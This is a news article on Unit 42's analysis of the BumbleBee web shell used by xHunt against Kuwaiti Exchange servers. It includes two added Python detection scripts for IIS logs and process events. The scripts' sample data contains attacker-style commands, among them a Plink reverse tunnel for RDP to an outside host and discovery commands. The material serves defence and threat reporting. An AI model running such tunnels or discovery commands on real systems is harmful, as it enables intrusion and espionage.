The BumbleBee web shell allows APT attackers to upload and download files, and move laterally by running commands.
A web shell called BumbleBee has taken flight in an ongoing xHunt espionage campaign that has targeted Microsoft Exchange servers at Kuwaiti organizations.
According to researchers at Palo Alto Networks' Unit 42, BumbleBee (so named because of its color scheme) was observed being used to upload and download files to and from a compromised Exchange server back in September.
"We found BumbleBee hosted on an internal Internet Information Services (IIS) web server on the same network as the compromised Exchange server, as well as on two internal IIS web servers at two other Kuwaiti organizations," researchers explained in a Monday blog.
Analysis showed that the attackers used VPN access to talk directly to BumbleBee, often switching between different VPN servers that appeared to be in different countries, including Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden and the U.K.
This hodgepodge approach was also borne out in the rotation of different operating systems and browsers, specifically Mozilla Firefox or Google Chrome on Windows 10, Windows 8.1 or Linux systems, the firm found.
"We believe this is an attempt to evade detection and make analysis of the malicious activities more difficult," Unit 42 researchers noted. "This [also] suggests the actor has access to multiple systems and uses this to make analysis of the activities more difficult, or that there are multiple actors involved, who have differing preferences for operating systems and browsers."
BumbleBee was also used in lateral-movement efforts, running commands from the attackers to find additional systems. Indeed, the researchers discovered additional BumbleBee web shells hosted on internal IIS web servers that are not connected to the internet at all three Kuwaiti organizations. The attackers interacted with these over SSH tunnels created with the PuTTY Link (Plink) tool.
"We observed the actor using Plink to create an SSH tunnel for TCP port 3389, which suggests that the actor used the tunnel to access the system using Remote Desktop Protocol (RDP)," researchers wrote. "We also observed the actor creating SSH tunnels to internal servers for TCP port 80, which suggests the actor used the tunnel to access internal IIS web servers. We believe that the actor accessed these additional internal IIS web servers to leverage file uploading functionality in internal web applications to install BumbleBee as a method of lateral movement."
BumbleBee: Password Pollination
Looking deeper into the web shell, Unit 42 found that BumbleBee requires an attacker to supply one password to view the web shell, and a second password to interact with it.
"The actor must [first] provide a password in a URL parameter named parameter," according to the firm. "Otherwise, the form used to interact with BumbleBee will not display in the browser. To check the supplied password for authentication, the web shell will generate an MD5 hash of the parameter value and check it with a hardcoded MD5 hash."
Once the operators are able to access BumbleBee, it provides three main functionalities: executing commands, and uploading and downloading files from the compromised server.
"To carry out any of these functions, the actor must supply a second password," researchers wrote. "The BumbleBee web shell will generate an MD5 hash of the password and check it with a hardcoded MD5 hash before carrying out the functionality."
BumbleBee, the Spy Bee
In looking at the IIS server logs and other logs from the Exchange server, the researchers were able to observe the HTTP POST requests generated when the attackers issued commands via BumbleBee.
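As an added illustration of the kind of log review described above (this is example code, not part of the Unit 42 report or Threatpost's article), the Python script below scans IIS W3C extended log lines for the request pattern the report attributes to BumbleBee: POST requests to an .aspx resource outside the host's expected application paths, a query string carrying the key literally named "parameter" (the first-stage password field), the cq.aspx filename, and a single resource being reached from many client IP / User-Agent combinations (the VPN and browser rotation). The log lines, the allowlist and the /aspnet_client/bb.aspx path are constructed for the example; only the cq.aspx name comes from the report.

```python
"""Scan IIS W3C extended log lines for BumbleBee-style web shell activity.

Heuristics derived from the reported tradecraft:
  * POST requests to an .aspx resource outside the expected application paths
  * a query string carrying a key literally named "parameter" (the first-stage
    password field the report describes)
  * the cq.aspx filename named in the report
  * one resource reached from many client IP / User-Agent combinations (the
    VPN and browser rotation the report describes)
All log lines, the allowlist and the /aspnet_client/bb.aspx path are
constructed for this example; only cq.aspx comes from the report.
"""
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed allowlist: resources that legitimately receive POSTs on this host.
# A real deployment would build this from its own traffic baseline.
EXPECTED_POST_STEMS = {"/owa/auth.owa", "/ews/exchange.asmx", "/autodiscover/autodiscover.xml"}
KNOWN_SHELL_NAMES = {"cq.aspx"}

# Constructed sample log. IIS encodes spaces in the User-Agent as '+', so each
# line is exactly one token per field named in the #Fields header.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2020-09-16 08:01:10 10.0.0.5 POST /owa/auth.owa - 443 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0)+Firefox/80.0 302
2020-09-16 08:05:42 10.0.0.5 GET /aspnet_client/bb.aspx parameter=REDACTED 443 198.51.100.21 Mozilla/5.0+(Windows+NT+10.0)+Firefox/80.0 200
2020-09-16 08:06:03 10.0.0.5 POST /aspnet_client/bb.aspx parameter=REDACTED 443 198.51.100.21 Mozilla/5.0+(Windows+NT+10.0)+Firefox/80.0 200
2020-09-16 09:14:55 10.0.0.5 POST /aspnet_client/bb.aspx parameter=REDACTED 443 192.0.2.77 Mozilla/5.0+(Windows+NT+6.3)+Chrome/85.0 200
2020-09-16 10:40:19 10.0.0.5 POST /aspnet_client/bb.aspx parameter=REDACTED 443 198.51.100.140 Mozilla/5.0+(X11;+Linux+x86_64)+Chrome/85.0 200
2020-09-10 11:22:08 10.0.0.9 POST /upload/cq.aspx - 80 10.0.0.5 Mozilla/5.0+(Windows+NT+10.0)+Firefox/80.0 200
"""


def parse_w3c(lines):
    """Yield one dict per data line, using the most recent #Fields header for keys."""
    fields = None
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        yield dict(zip(fields, values))


def flag_record(rec):
    """Return the reasons a single request record looks like web shell traffic."""
    reasons = []
    stem = rec.get("cs-uri-stem", "").lower()
    query = rec.get("cs-uri-query", "-")
    if rec.get("cs-method") == "POST" and stem.endswith(".aspx") and stem not in EXPECTED_POST_STEMS:
        reasons.append("POST to unexpected .aspx")
    if stem.rsplit("/", 1)[-1] in KNOWN_SHELL_NAMES:
        reasons.append("known web shell filename")
    if query != "-" and "parameter" in parse_qs(query):
        reasons.append("query key 'parameter' (BumbleBee password field)")
    return reasons


def scan(lines, rotation_threshold=3):
    """Return {uri-stem: set(reasons)} for every resource that trips a heuristic.

    The rotation check only fires on resources that already look suspicious,
    so a busy legitimate endpoint is not flagged merely for having many clients.
    """
    findings = defaultdict(set)
    clients = defaultdict(set)
    for rec in parse_w3c(lines):
        stem = rec.get("cs-uri-stem", "").lower()
        for reason in flag_record(rec):
            findings[stem].add(reason)
        clients[stem].add((rec.get("c-ip"), rec.get("cs(User-Agent)")))
    for stem, pairs in clients.items():
        if stem in findings and len(pairs) >= rotation_threshold:
            findings[stem].add("many client IP/User-Agent combinations")
    return dict(findings)


if __name__ == "__main__":
    for stem, reasons in scan(SAMPLE_LOG.splitlines()).items():
        print(stem, "->", "; ".join(sorted(reasons)))
```

The allowlist is deliberately a set of exact stems rather than prefixes: a web shell dropped under /owa/ would otherwise be hidden by a prefix rule. In practice the rotation threshold should be tuned against the host's own baseline, since the report notes the actor switched VPN exit, OS and browser within a single session.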
After some additional analysis, researchers were able to piece together a fuller picture of what BumbleBee is specifically used for.
"The actor spent three hours and 37 minutes on Sept. 16, 2020, running commands via the BumbleBee web shell installed on the [first] compromised Exchange server," according to the analysis.
The activities included performing network discovery using ping and net group commands, as well as PowerShell, to find additional computers on the network, and performing account discovery using the whoami and quser commands. The attackers also determined the system time using the W32tm and time commands, created an SSH tunnel using Plink to a remote host, and used RDP over that SSH tunnel to control the compromised computer. They also performed lateral movement to another organization by mounting a shared folder, and, finally, they removed evidence of the attack by deleting BumbleBee after they were done issuing commands.
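The command sequence above, together with the Plink tunnels described earlier (TCP 3389 for RDP and TCP 80 for internal IIS servers), is the kind of host activity a defender can look for in process-creation telemetry. The following Python script is an added example, not code from the report, that tags constructed process events for the discovery commands named above and for Plink command lines whose -L/-R forwarding specs mention a port of interest, then reports hosts where both appear together. The event field names (Computer, Image, ParentImage, CommandLine) follow Sysmon event ID 1 as an assumption about the log source, and treating w3wp.exe (the IIS worker process) as the parent of web-shell-spawned commands is likewise an assumption rather than a detail from the report.

```python
"""Tag Windows process-creation events for the post-exploitation sequence the
report describes: discovery commands (ping, net group, whoami, quser, w32tm,
time, PowerShell) run from the web shell, followed by a Plink SSH tunnel
forwarding TCP 3389 (RDP) or TCP 80 (internal IIS).

All events are constructed. Field names follow Sysmon event ID 1 as an
assumption about the log source; w3wp.exe as the parent of shell-spawned
commands is also an assumption, not a detail from the report.
"""
import re

# PowerShell is included because the report says it was used for discovery;
# a production rule would inspect the script rather than tag every launch.
DISCOVERY_BINARIES = {"ping.exe", "net.exe", "net1.exe", "whoami.exe",
                      "quser.exe", "w32tm.exe", "powershell.exe"}
CMD_BUILTINS = {"time"}             # 'time' only appears inside cmd.exe's command line
TUNNEL_PORTS_OF_INTEREST = {3389, 80}
IIS_WORKER = "w3wp.exe"

# Plink's forwarding options: -L [listen_ip:]port:host:hostport and -R likewise.
FORWARD_RE = re.compile(r"-[LR]\s*(?P<spec>\S+)")

W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [  # constructed for illustration
    {"Computer": "EXCH01", "ParentImage": W3WP, "Image": CMD, "CommandLine": "cmd.exe /c time /t"},
    {"Computer": "EXCH01", "ParentImage": CMD, "Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami"},
    {"Computer": "EXCH01", "ParentImage": CMD, "Image": r"C:\Windows\System32\quser.exe", "CommandLine": "quser"},
    {"Computer": "EXCH01", "ParentImage": CMD, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": 'net group "domain computers" /domain'},
    {"Computer": "EXCH01", "ParentImage": CMD, "Image": r"C:\Windows\System32\PING.EXE", "CommandLine": "ping -n 1 10.0.0.9"},
    {"Computer": "EXCH01", "ParentImage": CMD, "Image": r"C:\Windows\System32\w32tm.exe", "CommandLine": "w32tm /tz"},
    {"Computer": "EXCH01", "ParentImage": CMD, "Image": r"C:\Users\Public\plink.exe",
     "CommandLine": "plink.exe -N -R 3389:127.0.0.1:3389 -P 22 svc@198.51.100.7 -pw REDACTED"},
    {"Computer": "WS05", "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping fileserver"},
    {"Computer": "WS05", "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Tools\plink.exe",
     "CommandLine": "plink.exe -N -L 5901:127.0.0.1:5901 admin@jumphost"},
]


def basename(path):
    """Lower-cased file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def plink_forwarded_ports(cmdline):
    """Return every numeric port mentioned in -L/-R forwarding specs."""
    ports = set()
    for m in FORWARD_RE.finditer(cmdline):
        for part in m.group("spec").split(":"):
            if part.isdigit():
                ports.add(int(part))
    return ports


def classify(event):
    """Tags for one event: 'discovery:<cmd>', 'tunnel:<port>', 'tunnel:other', 'iis-spawned'."""
    tags = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image in DISCOVERY_BINARIES:
        tags.append("discovery:" + image.rsplit(".", 1)[0])
    if image == "cmd.exe":
        words = {w.lower() for w in cmd.replace("&", " ").split()}
        tags += ["discovery:" + b for b in sorted(CMD_BUILTINS & words)]
    if image == "plink.exe":
        ports = plink_forwarded_ports(cmd)
        hits = sorted(ports & TUNNEL_PORTS_OF_INTEREST)
        if hits:
            tags += [f"tunnel:{p}" for p in hits]
        elif ports:
            tags.append("tunnel:other")
    if parent == IIS_WORKER:
        tags.append("iis-spawned")
    return tags


def score_hosts(events, min_discovery=3):
    """Group tags per host and return those showing at least min_discovery
    distinct discovery commands AND a tunnel on a port of interest."""
    per_host = {}
    for ev in events:
        h = per_host.setdefault(ev.get("Computer", "?"),
                                {"discovery": set(), "tunnel_ports": set(), "iis_spawned": False})
        for t in classify(ev):
            kind, _, value = t.partition(":")
            if kind == "discovery":
                h["discovery"].add(value)
            elif kind == "tunnel" and value != "other":
                h["tunnel_ports"].add(int(value))
            elif kind == "iis-spawned":
                h["iis_spawned"] = True
    return {host: h for host, h in per_host.items()
            if len(h["discovery"]) >= min_discovery and h["tunnel_ports"]}


if __name__ == "__main__":
    for host, summary in score_hosts(SAMPLE_EVENTS).items():
        print(host, summary)
```

Requiring the tunnel and several distinct discovery commands on the same host keeps a lone administrator running ping or quser from tripping the rule, while the iis_spawned flag records whether any of the activity descended from the IIS worker process, which is the strongest single indicator that a web shell rather than an interactive user issued the commands.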
In addition to analyzing commands executed on the compromised Exchange server, Unit 42 also analyzed the commands executed on the BumbleBee web shell at an internal IIS web server hosted at one of the two other Kuwaiti organizations.
"On Sept. 10, 2020, we found that the actor ran several commands to perform network and user account discovery. Additionally, the actor used BumbleBee to upload a second web shell with a filename of cq.aspx. The actor used this second web shell to run a PowerShell script that issued SQL queries to a Microsoft SQL Server database."
Ongoing Campaign
The known xHunt threat group, which was first discovered in 2018 and has previously launched an assortment of attacks targeting the Kuwait government, as well as shipping and transportation organizations, has steadily updated its arsenal of tools, all in the service of spying on its targets.
The most recent campaign stretched back to February, when xHunt compromised an Exchange server via Outlook Web App using compromised credentials.
"The actor used the search functionality within Outlook Web App to search for email addresses, including searching for the domain name of the compromised Kuwaiti organization to get a full list of email addresses, as well as specific keywords, such as helpdesk," researchers explained. "We also saw the actor viewing emails in the compromised account's inbox, specifically emails from service providers and technology vendors. Additionally, the actor viewed alert emails from a Symantec product and Fortinet's FortiWeb product."
This searching for emails to the helpdesk and viewing of security alert emails suggests that xHunt was keeping abreast of whether the Kuwaiti organization had noticed malicious activity.
"The attempts to conceal their location and the focus on viewing emails that might notify administrators of the compromised network of the attacker's presence may explain how the actor was able to maintain a presence on the compromised network for many months," the researchers noted.
Source: https://threatpost.com/bumblebee-exchange-servers-xhunt-spy/162973/